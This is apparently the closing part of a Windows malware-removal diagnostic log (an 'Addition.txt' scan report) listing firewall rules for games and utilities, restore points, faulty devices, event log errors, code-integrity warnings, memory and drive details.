FirewallRules: [{76F73696-53BD-4D11-BA3A-BDEBFC79DD07}] => (Allow) D:\Games\SteamLibrary\steamapps\common\SpaceEngineers\Bin64\SpaceEngineers.exe
FirewallRules: [{434C7092-A860-4CD6-9E9D-82607FDEFF6D}] => (Allow) D:\Games\SteamLibrary\steamapps\common\SpaceEngineers\Bin64\SpaceEngineers.exe
FirewallRules: [{E7E470DA-580F-44E1-B03C-97D05003950F}] => (Allow) D:\Games\SteamLibrary\steamapps\common\Rust\Rust.exe
FirewallRules: [{F2A240E4-16C9-4840-9FD9-F6D3D6515353}] => (Allow) D:\Games\SteamLibrary\steamapps\common\Rust\Rust.exe
FirewallRules: [{166E12C8-35E8-4E1E-BF06-D663D113E4F0}] => (Allow) D:\Steam\steamapps\common\Dawn of War III\RelicDoW3.exe
FirewallRules: [{4BE81D4D-998C-4EC9-A307-01DA947F5E50}] => (Allow) D:\Steam\steamapps\common\Dawn of War III\RelicDoW3.exe
FirewallRules: [{6819D913-8216-40E7-91B1-67280E24198D}] => (Allow) D:\Games\SteamLibrary\steamapps\common\Counter-Strike Global Offensive\csgo.exe
FirewallRules: [{3EFA54BE-29A7-426A-A556-C25432E7FB96}] => (Allow) D:\Games\SteamLibrary\steamapps\common\Counter-Strike Global Offensive\csgo.exe
FirewallRules: [{37F99480-3ABE-4936-83FE-8ABDB7624FE0}] => (Allow) E:\Steam\Steam.exe
FirewallRules: [{5E4AF727-7F4E-4E6A-873B-2E5CB5F3548D}] => (Allow) E:\Steam\Steam.exe
FirewallRules: [{6D1C296B-FD43-448A-B56A-837BC575FEAF}] => (Allow) E:\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{15BB5F1A-9ED2-4B90-98EF-DBC6711B9715}] => (Allow) E:\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{CCE6C2DC-BB6A-4BF6-820E-0B28BE630593}] => (Allow) C:\Program Files (x86)\VMware\VMware Player\vmware-authd.exe
FirewallRules: [{3A4C4847-566E-4B84-8A06-D72EE712599C}] => (Allow) C:\Program Files (x86)\VMware\VMware Player\vmware-authd.exe
FirewallRules: [{BEF6B988-F2C5-4448-B92A-2FBE0A345D98}] => (Allow) D:\Games\Stronghold 2\Stronghold2.exe
FirewallRules: [{02B54C9F-B20B-40F2-8D2D-5AE2270E5B03}] => (Allow) D:\Games\Stronghold 2\Stronghold2.exe
FirewallRules: [{F4A651BC-544A-483E-9256-8B88460A48EA}] => (Allow) C:\Users\Alex-PC\AppData\Roaming\GameRanger\GameRanger\GameRanger.exe
FirewallRules: [{1497B81D-BD9F-42BB-BC35-0806399B6085}] => (Allow) C:\Users\Alex-PC\AppData\Roaming\GameRanger\GameRanger\GameRanger.exe
FirewallRules: [{0646E467-C060-45C9-9C26-E76A575818FD}] => (Allow) C:\Users\Alex-PC\AppData\Roaming\GameRanger\GameRanger\GameRanger.exe
FirewallRules: [{D11DA955-5390-4A15-94E3-29FE3F9E3569}] => (Allow) C:\Users\Alex-PC\AppData\Roaming\GameRanger\GameRanger\GameRanger.exe
FirewallRules: [{DAACF9E3-61B8-4962-8801-1D1596BE1B70}] => (Allow) D:\Games\SteamLibrary\steamapps\common\TheLongDark\tld.exe
FirewallRules: [{434683A1-1173-4A48-BD06-12042CF3761E}] => (Allow) D:\Games\SteamLibrary\steamapps\common\TheLongDark\tld.exe
FirewallRules: [{5AB146E1-C2B6-4BD2-BBE7-9F0612C95A57}] => (Allow) D:\Games\SteamLibrary\steamapps\common\The Forest\TheForest.exe
FirewallRules: [{FFEE4CA4-70DE-41A4-8641-D07913E9FEA1}] => (Allow) D:\Games\SteamLibrary\steamapps\common\The Forest\TheForest.exe
FirewallRules: [{4AFA7BA1-2F6D-4912-B1E5-BFC0479D19D7}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{C1EBE432-4A21-4F16-ACB9-AEB9772FAB5E}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{FA335A95-5AEA-4545-BD0E-59149E3863FB}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{6CFE7EA6-5E03-48BF-A122-A6688FD3C6F2}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{98C562EA-2D98-492E-9CBC-334B75926AE0}] => (Allow) D:\Games\SteamLibrary\steamapps\common\PAYDAY The Heist\payday_win32_release.exe
FirewallRules: [{C2930C1F-7B6E-4630-9C5D-4263DCE443D1}] => (Allow) D:\Games\SteamLibrary\steamapps\common\PAYDAY The Heist\payday_win32_release.exe

==================== Restore Points =========================

19-07-2017 01:46:41 Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030
19-07-2017 01:46:53 Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501
26-07-2017 03:34:34 Scheduled Checkpoint
27-07-2017 23:22:05 Installed Minecraft

==================== Faulty Device Manager Devices =============

Name: TunnelBear Adapter V9
Description: TunnelBear Adapter V9
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: TunnelBear Provider V9
Service: tap-tb-0901
Problem: : This device is disabled. (Code 22)
Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions.

Name: SteelSeries Sensei Wireless
Description: SteelSeries Sensei Wireless
Class Guid: {4d36e96b-e325-11ce-bfc1-08002be10318}
Manufacturer: SteelSeries ApS
Service: kbdhid
Problem: : This device cannot start. (Code10)
Resolution: Device failed to start. Click "Update Driver" to update the drivers for this device.
On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard.


==================== Event log errors: =========================

Application errors:
==================
Error: (07/30/2017 08:59:00 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 2484) (User: DESKTOP-B9SFE6M)
Description: Package Microsoft.Windows.Photos_2017.18062.13720.0_x64__8wekyb3d8bbwe+App was terminated because it took too long to suspend.

Error: (07/29/2017 11:53:27 PM) (Source: Software Protection Platform Service) (EventID: 8229) (User: )
Description: The rules engine failed to perform one or more scheduled actions.
Error Code:0x80070002
Path:<none>
Arguments:<none>

Error: (07/29/2017 11:48:27 PM) (Source: Software Protection Platform Service) (EventID: 8229) (User: )
Description: The rules engine failed to perform one or more scheduled actions.
Error Code:0x80070002
Path:<none>
Arguments:<none>

Error: (07/29/2017 08:29:30 PM) (Source: Perflib) (EventID: 1008) (User: )
Description: The Open Procedure for service "usbhub" in DLL "C:\WINDOWS\system32\usbperf.dll" failed. Performance data for this service will not be available. The first four bytes (DWORD) of the Data section contains the error code.

Error: (07/29/2017 08:29:30 PM) (Source: usbperf) (EventID: 2001) (User: )
Description: Unable to read the "First Counter" value under the usbperf\Performance Key. Status codes returned in data.

Error: (07/29/2017 08:29:30 PM) (Source: Perflib) (EventID: 1023) (User: )
Description: Windows cannot load the extensible counter DLL TermService. The first four bytes (DWORD) of the Data section contains the Windows error code.

Error: (07/29/2017 08:29:30 PM) (Source: Perflib) (EventID: 1008) (User: )
Description: The Open Procedure for service "RemoteAccess" in DLL "C:\Windows\System32\rasctrs.dll" failed. Performance data for this service will not be available. The first four bytes (DWORD) of the Data section contains the error code.

Error: (07/29/2017 08:29:30 PM) (Source: Perflib) (EventID: 1023) (User: )
Description: Windows cannot load the extensible counter DLL rdyboost. The first four bytes (DWORD) of the Data section contains the Windows error code.

Error: (07/29/2017 08:29:29 PM) (Source: Perflib) (EventID: 1008) (User: )
Description: The Open Procedure for service "MSDTC" in DLL "C:\WINDOWS\system32\msdtcuiu.DLL" failed. Performance data for this service will not be available. The first four bytes (DWORD) of the Data section contains the error code.

Error: (07/29/2017 08:29:29 PM) (Source: Perflib) (EventID: 1008) (User: )
Description: The Open Procedure for service "ESENT" in DLL "C:\WINDOWS\system32\esentprf.dll" failed. Performance data for this service will not be available. The first four bytes (DWORD) of the Data section contains the error code.


System errors:
=============
Error: (07/29/2017 11:53:27 PM) (Source: DCOM) (EventID: 10000) (User: NT AUTHORITY)
Description: Unable to start a DCOM Server: {3C296D07-90AE-4FAC-86F9-65EAA8B82D22}. The error:
"2"
Happened while starting this command:
C:\WINDOWS\system32\SppExtComObj.exe -Embedding

Error: (07/29/2017 11:53:27 PM) (Source: DCOM) (EventID: 10000) (User: NT AUTHORITY)
Description: Unable to start a DCOM Server: {3C296D07-90AE-4FAC-86F9-65EAA8B82D22}. The error:
"2"
Happened while starting this command:
C:\WINDOWS\system32\SppExtComObj.exe -Embedding

Error: (07/29/2017 11:53:27 PM) (Source: DCOM) (EventID: 10000) (User: NT AUTHORITY)
Description: Unable to start a DCOM Server: {3C296D07-90AE-4FAC-86F9-65EAA8B82D22}. The error:
"2"
Happened while starting this command:
C:\WINDOWS\system32\SppExtComObj.exe -Embedding

Error: (07/29/2017 11:48:27 PM) (Source: DCOM) (EventID: 10000) (User: NT AUTHORITY)
Description: Unable to start a DCOM Server: {3C296D07-90AE-4FAC-86F9-65EAA8B82D22}. The error:
"2"
Happened while starting this command:
C:\WINDOWS\system32\SppExtComObj.exe -Embedding

Error: (07/29/2017 11:48:27 PM) (Source: DCOM) (EventID: 10000) (User: NT AUTHORITY)
Description: Unable to start a DCOM Server: {3C296D07-90AE-4FAC-86F9-65EAA8B82D22}. The error:
"2"
Happened while starting this command:
C:\WINDOWS\system32\SppExtComObj.exe -Embedding

Error: (07/29/2017 11:48:27 PM) (Source: DCOM) (EventID: 10000) (User: NT AUTHORITY)
Description: Unable to start a DCOM Server: {3C296D07-90AE-4FAC-86F9-65EAA8B82D22}. The error:
"2"
Happened while starting this command:
C:\WINDOWS\system32\SppExtComObj.exe -Embedding

Error: (07/29/2017 05:26:08 PM) (Source: DCOM) (EventID: 10000) (User: NT AUTHORITY)
Description: Unable to start a DCOM Server: {3C296D07-90AE-4FAC-86F9-65EAA8B82D22}. The error:
"2"
Happened while starting this command:
C:\WINDOWS\system32\SppExtComObj.exe -Embedding

Error: (07/29/2017 05:26:08 PM) (Source: DCOM) (EventID: 10000) (User: NT AUTHORITY)
Description: Unable to start a DCOM Server: {3C296D07-90AE-4FAC-86F9-65EAA8B82D22}. The error:
"2"
Happened while starting this command:
C:\WINDOWS\system32\SppExtComObj.exe -Embedding

Error: (07/29/2017 05:26:08 PM) (Source: DCOM) (EventID: 10000) (User: NT AUTHORITY)
Description: Unable to start a DCOM Server: {3C296D07-90AE-4FAC-86F9-65EAA8B82D22}. The error:
"2"
Happened while starting this command:
C:\WINDOWS\system32\SppExtComObj.exe -Embedding

Error: (07/29/2017 05:21:08 PM) (Source: DCOM) (EventID: 10000) (User: NT AUTHORITY)
Description: Unable to start a DCOM Server: {3C296D07-90AE-4FAC-86F9-65EAA8B82D22}. The error:
"2"
Happened while starting this command:
C:\WINDOWS\system32\SppExtComObj.exe -Embedding


CodeIntegrity:
===================================
  Date: 2017-07-21 14:03:20.050
  Description: Code Integrity determined that a process (\Device\HarddiskVolume6\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume6\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.

  Date: 2017-06-18 02:43:11.750
  Description: Code Integrity determined that a process (\Device\HarddiskVolume6\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume6\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.

  Date: 2017-06-18 02:43:09.777
  Description: Code Integrity determined that a process (\Device\HarddiskVolume6\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume6\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.

  Date: 2017-06-12 21:43:56.697
  Description: Code Integrity determined that a process (\Device\HarddiskVolume6\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume6\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.

  Date: 2017-06-08 23:52:53.301
  Description: Code Integrity determined that a process (\Device\HarddiskVolume6\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume6\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.

  Date: 2017-06-08 23:52:45.508
  Description: Code Integrity determined that a process (\Device\HarddiskVolume6\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume6\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.

  Date: 2017-06-04 16:18:46.328
  Description: Code Integrity determined that a process (\Device\HarddiskVolume6\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume6\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.

  Date: 2017-05-02 01:43:27.652
  Description: Code Integrity determined that a process (\Device\HarddiskVolume6\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume6\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.

  Date: 2017-04-13 00:49:23.260
  Description: Code Integrity determined that a process (\Device\HarddiskVolume6\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume6\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.

  Date: 2017-04-13 00:49:19.861
  Description: Code Integrity determined that a process (\Device\HarddiskVolume6\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe) attempted to load \Device\HarddiskVolume6\Windows\System32\nvspcap64.dll that did not meet the Store signing level requirements.


==================== Memory info ===========================

Processor: Intel(R) Core(TM) i7-4770 CPU @ 3.40GHz
Percentage of memory in use: 34%
Total physical RAM: 24527.23 MB
Available physical RAM: 15976.81 MB
Total Virtual: 28111.23 MB
Available Virtual: 17337.32 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:237.48 GB) (Free:84.94 GB) NTFS
Drive d: () (Fixed) (Total:683.59 GB) (Free:129.82 GB) NTFS
Drive e: () (Fixed) (Total:247.43 GB) (Free:146.92 GB) NTFS
Drive i: (Новый том) (Fixed) (Total:1863.01 GB) (Free:1810.16 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: 38387F6E)
Partition 1: (Not Active) - (Size=683.6 GB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=247.4 GB) - (Type=07 NTFS)

========================================================
Disk: 1 (MBR Code: Windows 7 or 8) (Size: 238.5 GB) (Disk ID: 00000000)

Partition: GPT.
Attempted reading MBR returned 0 bytes.
 Could not read MBR for disk 2.

==================== End of Addition.txt ============================